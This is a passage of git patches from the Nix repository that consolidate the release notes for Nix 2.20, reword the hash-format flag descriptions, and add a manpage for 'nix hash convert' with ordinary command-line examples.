store specified in the `store` Nix option. - -Because the resulting Nix expression must be copied back to the eval store in order to be imported, this requires the eval store to trust the build store's signatures. 
diff --git a/doc/manual/rl-next/mounted-ssh-store.md b/doc/manual/rl-next/mounted-ssh-store.md deleted file mode 100644 index 6df44dbb6..000000000 --- a/doc/manual/rl-next/mounted-ssh-store.md +++ /dev/null @@ -1,8 +0,0 @@ ---- -synopsis: Mounted SSH Store -issues: 7890 -prs: 7912 ---- - -Introduced the store [`mounted-ssh-ng://`](@docroot@/command-ref/new-cli/nix3-help-stores.md). -This store allows full access to a Nix store on a remote machine and additionally requires that the store be mounted in the local filesystem. diff --git a/doc/manual/rl-next/nix-config-show.md b/doc/manual/rl-next/nix-config-show.md deleted file mode 100644 index 26b961b76..000000000 --- a/doc/manual/rl-next/nix-config-show.md +++ /dev/null @@ -1,7 +0,0 @@ ---- -synopsis: Rename to `nix config show` -issues: 7672 -prs: 9477 ---- - -`nix show-config` was renamed to `nix config show`, and `nix doctor` was renamed to `nix config check`, to be more consistent with the rest of the command-line interface. diff --git a/doc/manual/rl-next/nix-env-json-drv-path.md b/doc/manual/rl-next/nix-env-json-drv-path.md deleted file mode 100644 index 734cefd1b..000000000 --- a/doc/manual/rl-next/nix-env-json-drv-path.md +++ /dev/null @@ -1,6 +0,0 @@ ---- -synopsis: Fix `nix-env --query --drv-path --json` -prs: 9257 ---- - -Fixed a bug where `nix-env --query` ignored `--drv-path` when `--json` was set. diff --git a/doc/manual/rl-next/nix-flake-check-logs-actions.md b/doc/manual/rl-next/nix-flake-check-logs-actions.md deleted file mode 100644 index 53a7b35eb..000000000 --- a/doc/manual/rl-next/nix-flake-check-logs-actions.md +++ /dev/null @@ -1,33 +0,0 @@ ---- -synopsis: Some stack overflow segfaults are fixed -issues: 8882 -prs: 8893 ---- - -`nix flake check` now logs the checks it runs and the derivations it evaluates: - -``` -$ nix flake check -v -evaluating flake... -checking flake output 'checks'... -checking derivation 'checks.aarch64-darwin.ghciwatch-tests'... 
-derivation evaluated to /nix/store/nh7dlvsrhds4cxl91mvgj4h5cbq6skmq-ghciwatch-test-0.3.0.drv -checking derivation 'checks.aarch64-darwin.ghciwatch-clippy'... -derivation evaluated to /nix/store/9cb5a6wmp6kf6hidqw9wphidvb8bshym-ghciwatch-clippy-0.3.0.drv -checking derivation 'checks.aarch64-darwin.ghciwatch-doc'... -derivation evaluated to /nix/store/8brdd3jbawfszpbs7vdpsrhy80as1il8-ghciwatch-doc-0.3.0.drv -checking derivation 'checks.aarch64-darwin.ghciwatch-fmt'... -derivation evaluated to /nix/store/wjhs0l1njl5pyji53xlmfjrlya0wmz8p-ghciwatch-fmt-0.3.0.drv -checking derivation 'checks.aarch64-darwin.ghciwatch-audit'... -derivation evaluated to /nix/store/z0mps8dyj2ds7c0fn0819y5h5611033z-ghciwatch-audit-0.3.0.drv -checking flake output 'packages'... -checking derivation 'packages.aarch64-darwin.default'... -derivation evaluated to /nix/store/41abbdyglw5x9vcsvd89xan3ydjf8d7r-ghciwatch-0.3.0.drv -checking flake output 'apps'... -checking flake output 'devShells'... -checking derivation 'devShells.aarch64-darwin.default'... -derivation evaluated to /nix/store/bc935gz7dylzmcpdb5cczr8gngv8pmdb-nix-shell.drv -running 5 flake checks... -warning: The check omitted these incompatible systems: aarch64-linux, x86_64-darwin, x86_64-linux -Use '--all-systems' to check all. -``` diff --git a/doc/manual/rl-next/nix-hash-convert.md b/doc/manual/rl-next/nix-hash-convert.md deleted file mode 100644 index 69db9508a..000000000 --- a/doc/manual/rl-next/nix-hash-convert.md +++ /dev/null @@ -1,47 +0,0 @@ ---- -synopsis: Add `nix hash convert` -prs: 9452 ---- - -New [`nix hash convert`](https://github.com/NixOS/nix/issues/8876) sub command with a fast track -to stabilization! Examples: - -- Convert the hash to `nix32`. - - ```bash - $ nix hash convert --hash-algo "sha1" --to nix32 "800d59cfcd3c05e900cb4e214be48f6b886a08df" - vw46m23bizj4n8afrc0fj19wrp7mj3c0 - ``` - `nix32` is a base32 encoding with a nix-specific character set. 
- Explicitly specify the hashing algorithm (optional with SRI hashes) but detect hash format by the length of the input - hash. -- Convert the hash to the `sri` format that includes an algorithm specification: - ```bash - nix hash convert --hash-algo "sha1" "800d59cfcd3c05e900cb4e214be48f6b886a08df" - sha1-gA1Zz808BekAy04hS+SPa4hqCN8= - ``` - or with an explicit `-to` format: - ```bash - nix hash convert --hash-algo "sha1" --to sri "800d59cfcd3c05e900cb4e214be48f6b886a08df" - sha1-gA1Zz808BekAy04hS+SPa4hqCN8= - ``` -- Assert the input format of the hash: - ```bash - nix hash convert --hash-algo "sha256" --from nix32 "ungWv48Bz+pBQUDeXa4iI7ADYaOWF3qctBD/YfIAFa0=" - error: input hash 'ungWv48Bz+pBQUDeXa4iI7ADYaOWF3qctBD/YfIAFa0=' does not have the expected format '--from nix32' - nix hash convert --hash-algo "sha256" --from nix32 "1b8m03r63zqhnjf7l5wnldhh7c134ap5vpj0850ymkq1iyzicy5s" - sha256-ungWv48Bz+pBQUDeXa4iI7ADYaOWF3qctBD/YfIAFa0= - ``` - -The `--to`/`--from`/`--hash-algo` parameters have context-sensitive auto-completion. - -## Related Deprecations - -The following commands are still available but will emit a deprecation warning. Please convert your code to -`nix hash convert`: - -- `nix hash to-base16 $hash1 $hash2`: Use `nix hash convert --to base16 $hash1 $hash2` instead. -- `nix hash to-base32 $hash1 $hash2`: Use `nix hash convert --to nix32 $hash1 $hash2` instead. -- `nix hash to-base64 $hash1 $hash2`: Use `nix hash convert --to base64 $hash1 $hash2` instead. -- `nix hash to-sri $hash1 $hash2`: : Use `nix hash convert --to sri $hash1 $hash2` - or even just `nix hash convert $hash1 $hash2` instead. 
diff --git a/doc/manual/rl-next/nix-profile-names.md b/doc/manual/rl-next/nix-profile-names.md deleted file mode 100644 index b7ad4b5d7..000000000 --- a/doc/manual/rl-next/nix-profile-names.md +++ /dev/null @@ -1,8 +0,0 @@ ---- -synopsis: "`nix profile` now allows referring to elements by human-readable name" -prs: 8678 ---- - -[`nix profile`](@docroot@/command-ref/new-cli/nix3-profile.md) now uses names to refer to installed packages when running [`list`](@docroot@/command-ref/new-cli/nix3-profile-list.md), [`remove`](@docroot@/command-ref/new-cli/nix3-profile-remove.md) or [`upgrade`](@docroot@/command-ref/new-cli/nix3-profile-upgrade.md) as opposed to indices. Profile element names are generated when a package is installed and remain the same until the package is removed. - -**Warning**: The `manifest.nix` file used to record the contents of profiles has changed. Nix will automatically upgrade profiles to the new version when you modify the profile. After that, the profile can no longer be used by older versions of Nix. diff --git a/doc/manual/rl-next/nix-store-add.md b/doc/manual/rl-next/nix-store-add.md deleted file mode 100644 index 5ef2913b4..000000000 --- a/doc/manual/rl-next/nix-store-add.md +++ /dev/null @@ -1,7 +0,0 @@ ---- -synopsis: Give `nix store add` a `--hash-algo` flag -prs: 9809 ---- - -Adds a missing feature that was present in the old CLI, and matches our -plans to have similar flags for `nix hash convert` and `nix hash path`. diff --git a/doc/manual/rl-next/print-value-in-coercion-error.md b/doc/manual/rl-next/print-value-in-coercion-error.md deleted file mode 100644 index 046e4e3cf..000000000 --- a/doc/manual/rl-next/print-value-in-coercion-error.md +++ /dev/null @@ -1,24 +0,0 @@ ---- -synopsis: Coercion errors include the failing value -issues: #561 -prs: #9754 ---- - -The `error: cannot coerce a to a string` message now includes the value -which caused the error. 
- -Before: - -``` - error: cannot coerce a set to a string -``` - -After: - -``` - error: cannot coerce a set to a string: { aesSupport = «thunk»; - avx2Support = «thunk»; avx512Support = «thunk»; avxSupport = «thunk»; - canExecute = «thunk»; config = «thunk»; darwinArch = «thunk»; darwinMinVersion - = «thunk»; darwinMinVersionVariable = «thunk»; darwinPlatform = «thunk»; «84 - attributes elided»} -``` diff --git a/doc/manual/rl-next/print-value-in-type-error.md b/doc/manual/rl-next/print-value-in-type-error.md deleted file mode 100644 index aaae22756..000000000 --- a/doc/manual/rl-next/print-value-in-type-error.md +++ /dev/null @@ -1,23 +0,0 @@ ---- -synopsis: Type errors include the failing value -issues: #561 -prs: #9753 ---- - -In errors like `value is an integer while a list was expected`, the message now -includes the failing value. - -Before: - -``` - error: value is a set while a string was expected -``` - -After: - -``` - error: expected a string but found a set: { ghc810 = «thunk»; - ghc8102Binary = «thunk»; ghc8107 = «thunk»; ghc8107Binary = «thunk»; - ghc865Binary = «thunk»; ghc90 = «thunk»; ghc902 = «thunk»; ghc92 = «thunk»; - ghc924Binary = «thunk»; ghc925 = «thunk»; «17 attributes elided»} -``` diff --git a/doc/manual/rl-next/source-positions-in-errors.md b/doc/manual/rl-next/source-positions-in-errors.md deleted file mode 100644 index b1a33d83b..000000000 --- a/doc/manual/rl-next/source-positions-in-errors.md +++ /dev/null @@ -1,42 +0,0 @@ ---- -synopsis: Source locations are printed more consistently in errors -issues: 561 -prs: 9555 ---- - -Source location information is now included in error messages more -consistently. 
Given this code: - -```nix -let - attr = {foo = "bar";}; - key = {}; -in - attr.${key} -``` - -Previously, Nix would show this unhelpful message when attempting to evaluate -it: - -``` -error: - … while evaluating an attribute name - - error: value is a set while a string was expected -``` - -Now, the error message displays where the problematic value was found: - -``` -error: - … while evaluating an attribute name - - at bad.nix:4:11: - - 3| key = {}; - 4| in attr.${key} - | ^ - 5| - - error: expected a string but found a set -``` diff --git a/doc/manual/rl-next/stack-overflow-segfaults.md b/doc/manual/rl-next/stack-overflow-segfaults.md deleted file mode 100644 index 3d9753248..000000000 --- a/doc/manual/rl-next/stack-overflow-segfaults.md +++ /dev/null @@ -1,32 +0,0 @@ ---- -synopsis: Some stack overflow segfaults are fixed -issues: 9616 -prs: 9617 ---- - -The number of nested function calls has been restricted, to detect and report -infinite function call recursions. The default maximum call depth is 10,000 and -can be set with [the `max-call-depth` -option](@docroot@/command-ref/conf-file.md#conf-max-call-depth). - -This fixes segfaults or the following unhelpful error message in many cases: - - error: stack overflow (possible infinite recursion) - -Before: - -``` -$ nix-instantiate --eval --expr '(x: x x) (x: x x)' -Segmentation fault: 11 -``` - -After: - -``` -$ nix-instantiate --eval --expr '(x: x x) (x: x x)' -error: stack overflow - - at «string»:1:14: - 1| (x: x x) (x: x x) - | ^ -``` diff --git a/doc/manual/rl-next/with-error-reporting.md b/doc/manual/rl-next/with-error-reporting.md deleted file mode 100644 index d9e07df52..000000000 --- a/doc/manual/rl-next/with-error-reporting.md +++ /dev/null @@ -1,31 +0,0 @@ ---- -synopsis: Better error reporting for `with` expressions -prs: 9658 ---- - -`with` expressions using non-attrset values to resolve variables are now reported with proper positions. 
- -Previously an incorrect `with` expression would report no position at all, making it hard to determine where the error originated: - -``` -nix-repl> with 1; a -error: - … - - at «none»:0: (source not available) - - error: value is an integer while a set was expected -``` - -Now position information is preserved and reported as with most other errors: - -``` -nix-repl> with 1; a -error: - … while evaluating the first subexpression of a with expression - at «string»:1:1: - 1| with 1; a - | ^ - - error: expected a set but found an integer -``` diff --git a/doc/manual/src/SUMMARY.md.in b/doc/manual/src/SUMMARY.md.in index 10fe51fc9..695d63dfc 100644 --- a/doc/manual/src/SUMMARY.md.in +++ b/doc/manual/src/SUMMARY.md.in @@ -120,6 +120,7 @@ - [C++ style guide](contributing/cxx.md) - [Release Notes](release-notes/index.md) {{#include ./SUMMARY-rl-next.md}} + - [Release 2.20 (2024-01-29)](release-notes/rl-2.20.md) - [Release 2.19 (2023-11-17)](release-notes/rl-2.19.md) - [Release 2.18 (2023-09-20)](release-notes/rl-2.18.md) - [Release 2.17 (2023-07-24)](release-notes/rl-2.17.md) diff --git a/doc/manual/src/release-notes/rl-2.20.md b/doc/manual/src/release-notes/rl-2.20.md new file mode 100644 index 000000000..8c9267486 --- /dev/null +++ b/doc/manual/src/release-notes/rl-2.20.md @@ -0,0 +1,334 @@ +# Release 2.20.0 (2024-01-29) + +- Option `allowed-uris` can now match whole schemes in URIs without slashes [#9547](https://github.com/NixOS/nix/pull/9547) + + If a scheme, such as `github:` is specified in the `allowed-uris` option, all URIs starting with `github:` are allowed. + Previously this only worked for schemes whose URIs used the `://` syntax. 
+ +- Make `nix store gc` use the auto-GC policy [#7851](https://github.com/NixOS/nix/pull/7851) + + + +- Include cgroup stats when building through the daemon [#9598](https://github.com/NixOS/nix/pull/9598) + + Nix now also reports cgroup statistics when building through the nix daemon and when doing remote builds using ssh-ng, + if both sides of the connection are this version of Nix or newer. + +- Fix handling of truncated `.drv` files. [#9673](https://github.com/NixOS/nix/pull/9673) + + Previously a `.drv` that was truncated in the middle of a string would case nix to enter an infinite loop, eventually exhausting all memory and crashing. + +- Disallow empty search regex in `nix search` [#9481](https://github.com/NixOS/nix/pull/9481) + + [`nix search`](@docroot@/command-ref/new-cli/nix3-search.md) now requires a search regex to be passed. To show all packages, use `^`. + +- Reduce eval memory usage and wall time [#9658](https://github.com/NixOS/nix/pull/9658) + + Reduce the size of the `Env` struct used in the evaluator by a pointer, or 8 bytes on most modern machines. + This reduces memory usage during eval by around 2% and wall time by around 3%. + +- Add new `eval-system` setting [#4093](https://github.com/NixOS/nix/pull/4093) + + Add a new `eval-system` option. + Unlike `system`, it just overrides the value of `builtins.currentSystem`. + This is more useful than overriding `system`, because you can build these derivations on remote builders which can work on the given system. + In contrast, `system` also effects scheduling which will cause Nix to build those derivations locally even if that doesn't make sense. + + `eval-system` only takes effect if it is non-empty. + If empty (the default) `system` is used as before, so there is no breakage. 
+ +- Nix now uses `libgit2` for Git fetching [#5313](https://github.com/NixOS/nix/issues/5313) [#9240](https://github.com/NixOS/nix/pull/9240) [#9241](https://github.com/NixOS/nix/pull/9241) [#9258](https://github.com/NixOS/nix/pull/9258) [#9480](https://github.com/NixOS/nix/pull/9480) + + Nix has built-in support for fetching sources from Git, during evaluation and locking; outside the sandbox. + The existing implementation based on the Git CLI had issues regarding reproducibility and performance. + + Most of the original `fetchGit` behavior has been implemented using the `libgit2` library, which gives the fetcher fine-grained control. + + Known issues: + - The `export-subst` behavior has not been reimplemented. [Partial](https://github.com/NixOS/nix/pull/9391#issuecomment-1872503447) support for this Git feature is feasible, but it did not make the release window. + +- Rename hash format `base32` to `nix32` [#9452](https://github.com/NixOS/nix/pull/9452) + + Hash format `base32` was renamed to `nix32` since it used a special nix-specific character set for + [Base32](https://en.wikipedia.org/wiki/Base32). + + ## Deprecation: Use `nix32` instead of `base32` as `toHashFormat` + + For the builtin `convertHash`, the `toHashFormat` parameter now accepts the same hash formats as the `--to`/`--from` + parameters of the `nix hash conert` command: `"base16"`, `"nix32"`, `"base64"`, and `"sri"`. The former `"base32"` value + remains as a deprecated alias for `"base32"`. Please convert your code from: + + ```nix + builtins.convertHash { inherit hash hashAlgo; toHashFormat = "base32";} + ``` + + to + + ```nix + builtins.convertHash { inherit hash hashAlgo; toHashFormat = "nix32";} + ``` + +- import-from-derivation builds the derivation in the build store [#9661](https://github.com/NixOS/nix/pull/9661) + + When using `--eval-store`, `import`ing from a derivation will now result in the derivation being built on the build store, i.e. 
the store specified in the `store` Nix option. + + Because the resulting Nix expression must be copied back to the eval store in order to be imported, this requires the eval store to trust the build store's signatures. + +- Mounted SSH Store [#7890](https://github.com/NixOS/nix/issues/7890) [#7912](https://github.com/NixOS/nix/pull/7912) + + Introduced the store [`mounted-ssh-ng://`](@docroot@/command-ref/new-cli/nix3-help-stores.md). + This store allows full access to a Nix store on a remote machine and additionally requires that the store be mounted in the local filesystem. + +- Rename to `nix config show` [#7672](https://github.com/NixOS/nix/issues/7672) [#9477](https://github.com/NixOS/nix/pull/9477) + + `nix show-config` was renamed to `nix config show`, and `nix doctor` was renamed to `nix config check`, to be more consistent with the rest of the command-line interface. + +- Fix `nix-env --query --drv-path --json` [#9257](https://github.com/NixOS/nix/pull/9257) + + Fixed a bug where `nix-env --query` ignored `--drv-path` when `--json` was set. + +- Some stack overflow segfaults are fixed [#8882](https://github.com/NixOS/nix/issues/8882) [#8893](https://github.com/NixOS/nix/pull/8893) + + `nix flake check` now logs the checks it runs and the derivations it evaluates: + + ``` + $ nix flake check -v + evaluating flake... + checking flake output 'checks'... + checking derivation 'checks.aarch64-darwin.ghciwatch-tests'... + derivation evaluated to /nix/store/nh7dlvsrhds4cxl91mvgj4h5cbq6skmq-ghciwatch-test-0.3.0.drv + checking derivation 'checks.aarch64-darwin.ghciwatch-clippy'... + derivation evaluated to /nix/store/9cb5a6wmp6kf6hidqw9wphidvb8bshym-ghciwatch-clippy-0.3.0.drv + checking derivation 'checks.aarch64-darwin.ghciwatch-doc'... + derivation evaluated to /nix/store/8brdd3jbawfszpbs7vdpsrhy80as1il8-ghciwatch-doc-0.3.0.drv + checking derivation 'checks.aarch64-darwin.ghciwatch-fmt'... 
+ derivation evaluated to /nix/store/wjhs0l1njl5pyji53xlmfjrlya0wmz8p-ghciwatch-fmt-0.3.0.drv + checking derivation 'checks.aarch64-darwin.ghciwatch-audit'... + derivation evaluated to /nix/store/z0mps8dyj2ds7c0fn0819y5h5611033z-ghciwatch-audit-0.3.0.drv + checking flake output 'packages'... + checking derivation 'packages.aarch64-darwin.default'... + derivation evaluated to /nix/store/41abbdyglw5x9vcsvd89xan3ydjf8d7r-ghciwatch-0.3.0.drv + checking flake output 'apps'... + checking flake output 'devShells'... + checking derivation 'devShells.aarch64-darwin.default'... + derivation evaluated to /nix/store/bc935gz7dylzmcpdb5cczr8gngv8pmdb-nix-shell.drv + running 5 flake checks... + warning: The check omitted these incompatible systems: aarch64-linux, x86_64-darwin, x86_64-linux + Use '--all-systems' to check all. + ``` + +- Add `nix hash convert` [#9452](https://github.com/NixOS/nix/pull/9452) + + New [`nix hash convert`](https://github.com/NixOS/nix/issues/8876) sub command with a fast track + to stabilization! Examples: + + - Convert the hash to `nix32`. + + ```bash + $ nix hash convert --hash-algo "sha1" --to nix32 "800d59cfcd3c05e900cb4e214be48f6b886a08df" + vw46m23bizj4n8afrc0fj19wrp7mj3c0 + ``` + `nix32` is a base32 encoding with a nix-specific character set. + Explicitly specify the hashing algorithm (optional with SRI hashes) but detect hash format by the length of the input + hash. 
+ - Convert the hash to the `sri` format that includes an algorithm specification: + ```bash + nix hash convert --hash-algo "sha1" "800d59cfcd3c05e900cb4e214be48f6b886a08df" + sha1-gA1Zz808BekAy04hS+SPa4hqCN8= + ``` + or with an explicit `-to` format: + ```bash + nix hash convert --hash-algo "sha1" --to sri "800d59cfcd3c05e900cb4e214be48f6b886a08df" + sha1-gA1Zz808BekAy04hS+SPa4hqCN8= + ``` + - Assert the input format of the hash: + ```bash + nix hash convert --hash-algo "sha256" --from nix32 "ungWv48Bz+pBQUDeXa4iI7ADYaOWF3qctBD/YfIAFa0=" + error: input hash 'ungWv48Bz+pBQUDeXa4iI7ADYaOWF3qctBD/YfIAFa0=' does not have the expected format '--from nix32' + nix hash convert --hash-algo "sha256" --from nix32 "1b8m03r63zqhnjf7l5wnldhh7c134ap5vpj0850ymkq1iyzicy5s" + sha256-ungWv48Bz+pBQUDeXa4iI7ADYaOWF3qctBD/YfIAFa0= + ``` + + The `--to`/`--from`/`--hash-algo` parameters have context-sensitive auto-completion. + + ## Related Deprecations + + The following commands are still available but will emit a deprecation warning. Please convert your code to + `nix hash convert`: + + - `nix hash to-base16 $hash1 $hash2`: Use `nix hash convert --to base16 $hash1 $hash2` instead. + - `nix hash to-base32 $hash1 $hash2`: Use `nix hash convert --to nix32 $hash1 $hash2` instead. + - `nix hash to-base64 $hash1 $hash2`: Use `nix hash convert --to base64 $hash1 $hash2` instead. + - `nix hash to-sri $hash1 $hash2`: : Use `nix hash convert --to sri $hash1 $hash2` + or even just `nix hash convert $hash1 $hash2` instead. + +- `nix profile` now allows referring to elements by human-readable name [#8678](https://github.com/NixOS/nix/pull/8678) + + [`nix profile`](@docroot@/command-ref/new-cli/nix3-profile.md) now uses names to refer to installed packages when running [`list`](@docroot@/command-ref/new-cli/nix3-profile-list.md), [`remove`](@docroot@/command-ref/new-cli/nix3-profile-remove.md) or [`upgrade`](@docroot@/command-ref/new-cli/nix3-profile-upgrade.md) as opposed to indices. 
Profile element names are generated when a package is installed and remain the same until the package is removed. + + **Warning**: The `manifest.nix` file used to record the contents of profiles has changed. Nix will automatically upgrade profiles to the new version when you modify the profile. After that, the profile can no longer be used by older versions of Nix. + +- Rename hash format `base32` to `nix32` [#8678](https://github.com/NixOS/nix/pull/8678) + + Hash format `base32` was renamed to `nix32` since it used a special nix-specific character set for + [Base32](https://en.wikipedia.org/wiki/Base32). + + ## Deprecation: Use `nix32` instead of `base32` as `toHashFormat` + + For the builtin `convertHash`, the `toHashFormat` parameter now accepts the same hash formats as the `--to`/`--from` + parameters of the `nix hash conert` command: `"base16"`, `"nix32"`, `"base64"`, and `"sri"`. The former `"base32"` value + remains as a deprecated alias for `"base32"`. Please convert your code from: + + ```nix + builtins.convertHash { inherit hash hashAlgo; toHashFormat = "base32";} + ``` + + to + + ```nix + builtins.convertHash { inherit hash hashAlgo; toHashFormat = "nix32";} + ``` + +- Give `nix store add` a `--hash-algo` flag [#9809](https://github.com/NixOS/nix/pull/9809) + + Adds a missing feature that was present in the old CLI, and matches our + plans to have similar flags for `nix hash convert` and `nix hash path`. + +- Coercion errors include the failing value + + The `error: cannot coerce a to a string` message now includes the value + which caused the error. 
+ + Before: + + ``` + error: cannot coerce a set to a string + ``` + + After: + + ``` + error: cannot coerce a set to a string: { aesSupport = «thunk»; + avx2Support = «thunk»; avx512Support = «thunk»; avxSupport = «thunk»; + canExecute = «thunk»; config = «thunk»; darwinArch = «thunk»; darwinMinVersion + = «thunk»; darwinMinVersionVariable = «thunk»; darwinPlatform = «thunk»; «84 + attributes elided»} + ``` + +- Type errors include the failing value + + In errors like `value is an integer while a list was expected`, the message now + includes the failing value. + + Before: + + ``` + error: value is a set while a string was expected + ``` + + After: + + ``` + error: expected a string but found a set: { ghc810 = «thunk»; + ghc8102Binary = «thunk»; ghc8107 = «thunk»; ghc8107Binary = «thunk»; + ghc865Binary = «thunk»; ghc90 = «thunk»; ghc902 = «thunk»; ghc92 = «thunk»; + ghc924Binary = «thunk»; ghc925 = «thunk»; «17 attributes elided»} + ``` + +- Source locations are printed more consistently in errors [#561](https://github.com/NixOS/nix/issues/561) [#9555](https://github.com/NixOS/nix/pull/9555) + + Source location information is now included in error messages more + consistently. 
Given this code: + + ```nix + let + attr = {foo = "bar";}; + key = {}; + in + attr.${key} + ``` + + Previously, Nix would show this unhelpful message when attempting to evaluate + it: + + ``` + error: + … while evaluating an attribute name + + error: value is a set while a string was expected + ``` + + Now, the error message displays where the problematic value was found: + + ``` + error: + … while evaluating an attribute name + + at bad.nix:4:11: + + 3| key = {}; + 4| in attr.${key} + | ^ + 5| + + error: expected a string but found a set + ``` + +- Some stack overflow segfaults are fixed [#9616](https://github.com/NixOS/nix/issues/9616) [#9617](https://github.com/NixOS/nix/pull/9617) + + The number of nested function calls has been restricted, to detect and report + infinite function call recursions. The default maximum call depth is 10,000 and + can be set with [the `max-call-depth` + option](@docroot@/command-ref/conf-file.md#conf-max-call-depth). + + This fixes segfaults or the following unhelpful error message in many cases: + + error: stack overflow (possible infinite recursion) + + Before: + + ``` + $ nix-instantiate --eval --expr '(x: x x) (x: x x)' + Segmentation fault: 11 + ``` + + After: + + ``` + $ nix-instantiate --eval --expr '(x: x x) (x: x x)' + error: stack overflow + + at «string»:1:14: + 1| (x: x x) (x: x x) + | ^ + ``` + +- Better error reporting for `with` expressions [#9658](https://github.com/NixOS/nix/pull/9658) + + `with` expressions using non-attrset values to resolve variables are now reported with proper positions. 
+ + Previously an incorrect `with` expression would report no position at all, making it hard to determine where the error originated: + + ``` + nix-repl> with 1; a + error: + … + + at «none»:0: (source not available) + + error: value is an integer while a set was expected + ``` + + Now position information is preserved and reported as with most other errors: + + ``` + nix-repl> with 1; a + error: + … while evaluating the first subexpression of a with expression + at «string»:1:1: + 1| with 1; a + | ^ + + error: expected a set but found an integer + ``` + From 6f86f87043971eb9414a6d63013a1e06af397f3a Mon Sep 17 00:00:00 2001 From: Eelco Dolstra Date: Mon, 29 Jan 2024 17:50:25 +0100 Subject: [PATCH 361/654] Fix formatting of hash args --- src/libutil/args.cc | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/src/libutil/args.cc b/src/libutil/args.cc index 5187e7396..8996cbe5b 100644 --- a/src/libutil/args.cc +++ b/src/libutil/args.cc @@ -557,7 +557,7 @@ Args::Flag Args::Flag::mkHashFormatFlagWithDefault(std::string &&longName, HashF assert(*hf == nix::HashFormat::SRI); return Flag{ .longName = std::move(longName), - .description = "hash format ('base16', 'nix32', 'base64', 'sri'). Default: 'sri'", + .description = "Hash format (`base16`, `nix32`, `base64`, `sri`). 
Default: `sri`.", .labels = {"hash-format"}, .handler = {[hf](std::string s) { *hf = parseHashFormat(s); @@ -569,7 +569,7 @@ Args::Flag Args::Flag::mkHashFormatFlagWithDefault(std::string &&longName, HashF Args::Flag Args::Flag::mkHashFormatOptFlag(std::string && longName, std::optional * ohf) { return Flag{ .longName = std::move(longName), - .description = "hash format ('base16', 'nix32', 'base64', 'sri').", + .description = "Hash format (`base16`, `nix32`, `base64`, `sri`).", .labels = {"hash-format"}, .handler = {[ohf](std::string s) { *ohf = std::optional{parseHashFormat(s)}; @@ -589,7 +589,7 @@ Args::Flag Args::Flag::mkHashAlgoFlag(std::string && longName, HashAlgorithm * h { return Flag{ .longName = std::move(longName), - .description = "hash algorithm ('md5', 'sha1', 'sha256', or 'sha512')", + .description = "Hash algorithm (`md5`, `sha1`, `sha256`, or `sha512`).", .labels = {"hash-algo"}, .handler = {[ha](std::string s) { *ha = parseHashAlgo(s); @@ -602,7 +602,7 @@ Args::Flag Args::Flag::mkHashAlgoOptFlag(std::string && longName, std::optional< { return Flag{ .longName = std::move(longName), - .description = "hash algorithm ('md5', 'sha1', 'sha256', or 'sha512'). Optional as can also be gotten from SRI hash itself.", + .description = "Hash algorithm (`md5`, `sha1`, `sha256`, or `sha512`). 
Can be omitted for SRI hashes.", .labels = {"hash-algo"}, .handler = {[oha](std::string s) { *oha = std::optional{parseHashAlgo(s)}; From 9465c8cca133a149c003e9ef4d7e97d513716155 Mon Sep 17 00:00:00 2001 From: Eelco Dolstra Date: Mon, 29 Jan 2024 17:51:01 +0100 Subject: [PATCH 362/654] nix hash convert: Add manpage --- src/nix/hash-convert.md | 40 ++++++++++++++++++++++++++++++++++++++++ src/nix/hash.cc | 15 +++++++-------- 2 files changed, 47 insertions(+), 8 deletions(-) create mode 100644 src/nix/hash-convert.md diff --git a/src/nix/hash-convert.md b/src/nix/hash-convert.md new file mode 100644 index 000000000..dfb215443 --- /dev/null +++ b/src/nix/hash-convert.md @@ -0,0 +1,40 @@ +R""( + +# Examples + +* Convert a hash to `nix32` (a base-32 encoding with a Nix-specific character set). + + ```console + $ nix hash convert --hash-algo sha1 --to nix32 800d59cfcd3c05e900cb4e214be48f6b886a08df + vw46m23bizj4n8afrc0fj19wrp7mj3c0 + ``` + +* Convert a hash to [the `sri` format](https://developer.mozilla.org/en-US/docs/Web/Security/Subresource_Integrity) that includes an algorithm specification: + + ```console + # nix hash convert --hash-algo sha1 800d59cfcd3c05e900cb4e214be48f6b886a08df + sha1-gA1Zz808BekAy04hS+SPa4hqCN8= + ``` + + or with an explicit `--to` format: + + ```console + # nix hash convert --hash-algo sha1 --to sri 800d59cfcd3c05e900cb4e214be48f6b886a08df + sha1-gA1Zz808BekAy04hS+SPa4hqCN8= + ``` + +* Assert the input format of the hash: + + ```console + # nix hash convert --hash-algo sha256 --from nix32 ungWv48Bz+pBQUDeXa4iI7ADYaOWF3qctBD/YfIAFa0= + error: input hash 'ungWv48Bz+pBQUDeXa4iI7ADYaOWF3qctBD/YfIAFa0=' does not have the expected format '--from nix32' + + # nix hash convert --hash-algo sha256 --from nix32 1b8m03r63zqhnjf7l5wnldhh7c134ap5vpj0850ymkq1iyzicy5s + sha256-ungWv48Bz+pBQUDeXa4iI7ADYaOWF3qctBD/YfIAFa0= + ``` + +# Description + +`nix hash convert` converts hashes from one encoding to another. 
+ +)"" diff --git a/src/nix/hash.cc b/src/nix/hash.cc index 8ab89e433..4837891c6 100644 --- a/src/nix/hash.cc +++ b/src/nix/hash.cc @@ -150,15 +150,14 @@ struct CmdHashConvert : Command std::string description() override { - std::string descr( "convert between different hash formats. Choose from: "); - auto iter = hashFormats.begin(); - assert(iter != hashFormats.end()); - descr += *iter++; - while (iter != hashFormats.end()) { - descr += ", " + *iter++; - } + return "convert between hash formats"; + } - return descr; + std::string doc() override + { + return + #include "hash-convert.md" + ; } Category category() override { return catUtility; } From 652f334f879153b1357f92504999d9b0fb951a2b Mon Sep 17 00:00:00 2001 From: Eelco Dolstra Date: Mon, 29 Jan 2024 17:51:21 +0100 Subject: [PATCH 363/654] Edit release notes --- doc/manual/src/release-notes/rl-2.20.md | 223 +++--------------------- 1 file changed, 29 insertions(+), 194 deletions(-) diff --git a/doc/manual/src/release-notes/rl-2.20.md b/doc/manual/src/release-notes/rl-2.20.md index 8c9267486..26869e90a 100644 --- a/doc/manual/src/release-notes/rl-2.20.md +++ b/doc/manual/src/release-notes/rl-2.20.md @@ -5,190 +5,60 @@ If a scheme, such as `github:` is specified in the `allowed-uris` option, all URIs starting with `github:` are allowed. Previously this only worked for schemes whose URIs used the `://` syntax. -- Make `nix store gc` use the auto-GC policy [#7851](https://github.com/NixOS/nix/pull/7851) - - - - Include cgroup stats when building through the daemon [#9598](https://github.com/NixOS/nix/pull/9598) - Nix now also reports cgroup statistics when building through the nix daemon and when doing remote builds using ssh-ng, - if both sides of the connection are this version of Nix or newer. - -- Fix handling of truncated `.drv` files. 
